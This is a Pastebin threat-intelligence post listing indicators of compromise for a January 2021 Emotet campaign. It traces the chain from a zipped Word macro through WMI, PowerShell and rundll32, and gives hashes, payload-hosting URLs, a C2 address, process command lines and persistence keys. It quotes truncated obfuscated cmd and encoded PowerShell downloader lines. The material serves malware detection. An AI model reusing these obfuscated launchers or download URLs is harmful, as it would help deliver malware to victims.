API tools faq
paste
VRad

#emotet_200121

VRad
Jan 21st, 2021 (edited)
243
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.64 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #emotet #Epoch2 #packed #WMI #macro
  2.  
  3. https://pastebin.com/NFRmXi7k
  4.  
  5. previous_contact:
  6. https://pastebin.com/cNb8XhX1
  7. https://pastebin.com/1XfkVE5e
  8. https://pastebin.com/F520pqQW
  9.  
  10. FAQ:
  11. https://pastebin.com/AwMK1pSh
  12.  
  13. attack_vector
  14. --------------
  15. email attach .zip (passwd) > .doc > macro > WMI > cmd > powershell > rundll32 > dll
  16.  
  17. email_headers
  18. --------------
  19. n/a
  20.  
  21. files
  22. --------------
  23. SHA-256 3e9a50b4c96a150d63f8bc0fa21be57c21ce2d5be533fad249a40f470089a638
  24. File name Inv_9909.zip [Zip archive data, at least v5.1 to extract]
  25. File size 85.41 KB (87458 bytes)
  26.  
  27. SHA-256 1654619b2532228600711117c58dd4f3b715f1b6973f182865b93bf186fa68c9
  28. File name Inv_9909.doc [MS Word Document]
  29. File size 168.00 KB (172032 bytes)
  30.  
  31. SHA-256 01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
  32. File name G14C.dll [PE32 executable (DLL) (GUI) Intel 80386, for MS Windows]
  33. File size 342.34 KB (350552 bytes)
  34.  
  35. activity
  36. **************
  37. PL_SCR
  38. 404 - http://trainwithconviction.com/wp-admin/y/!
  39. 404 - http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/!
  40. 404 - https://perrasmoore.ca/wp-admin/rM6HK/!
  41. 200 - https://canadabrightway.com/wp-admin/n3/!
  42. 200 - https://upinsmokebatonrouge.com/var/Ux1V/!
  43. 404 - https://thelambertagency.com/staging/Vo/!
  44. 404 - https://stormhansen.com/2556460492/if/
  45.  
  46. C2 12.175.220.98
  47.  
  48. netwrk
  49. --------------
  50. 184.168.131.241 trainwithconviction.com GET /wp-admin/y/ HTTP/1.1
  51. 34.107.103.177 convictionfitness.ca Client Hello
  52. 23.235.208.88 trainwithconviction.webdmcsolutions.com GET /wp-admin/rEEEU/ HTTP/1.1
  53. 208.113.160.43 perrasmoore.ca Client Hello
  54. 107.180.50.167 canadabrightway.com Client Hello
  55.  
  56. 12.175.220.98 12.175.220.98 POST /gxgsw/zp6s9okv78r1wfc1qx5/fnzydkyg98o1/901fuwsycvt4syqm/ HTTP/1.1 Mozilla/4.0
  57.  
  58. comp
  59. --------------
  60. powershell.exe 3704 TCP 34.107.103.177 443 ESTABLISHED
  61. powershell.exe 3704 TCP 23.235.208.88 80 ESTABLISHED
  62.  
  63. powershell.exe 3704 TCP 208.113.160.43 443 ESTABLISHED
  64. powershell.exe 3704 TCP 107.180.50.167 443 ESTABLISHED
  65.  
  66. rundll32.exe 3908 TCP 12.175.220.98 80 ESTABLISHED
  67.  
  68. proc
  69. --------------
  70. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  71.  
  72. {another context}
  73.  
  74. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  75. C:\Windows\system32\cmd.exe /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en
  76. C:\Windows\system32\msg.exe operator /v Word experienced an error trying to open the file.
  77. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -enc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAAgAFsAdABZAHAAZQBdACgAIgB7. . .
  78. C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString
  79. C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString
  80. C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll",#1
  81. C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",mXAAXLTXI
  82. C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",#1
  83.  
  84. persist
  85. --------------
  86. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 21.01.2021 10:46
  87. iwwvfo.mzw c:\users\operator\appdata\local\lmmauwa\iwwvfo.mzw 20.01.2021 23:14
  88. C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",ZwYQYDDIS
  89.  
  90. drop
  91. --------------
  92. C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll
  93. C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw
  94.  
  95. # # #
  96. https://www.virustotal.com/gui/file/3e9a50b4c96a150d63f8bc0fa21be57c21ce2d5be533fad249a40f470089a638/details
  97. https://www.virustotal.com/gui/file/1654619b2532228600711117c58dd4f3b715f1b6973f182865b93bf186fa68c9/details
  98. https://www.virustotal.com/gui/file/01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98/details
  99. https://analyze.intezer.com/analyses/0817e716-a1c5-4208-a9e5-a1f7006ecb25
  100.  
  101. VR
  102.  
  103. macros>WMI>powershell
  104. #1
  105. cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAA...
  106.  
  107. #2
  108. sEt ydTUW ( [tYpe]("{4}{2}{0}{3}{5}{1}" -f 'Em','TORy','T','.Io.','SyS','direC')) ; set ("u"+"aX"+"KHR") ( [TYPe]("{5}{0}{1}{4}{2}{3}{6}"-f'iNt','mAn','g','E','a','SySTEM.nET.sErvicepO',...
  109.  
  110. #3
  111. ... -rePlAcE [cHAR]108[cHAR]66[cHAR]109,[cHAR]92$Htnfv2u.d ll;$Y74L=N53Q;$S8e6u_5=h tt p;$U7_xeo1=sg yw http://trainwithconviction.com/wp-admin/y/!sg yw http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/!sg ...
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!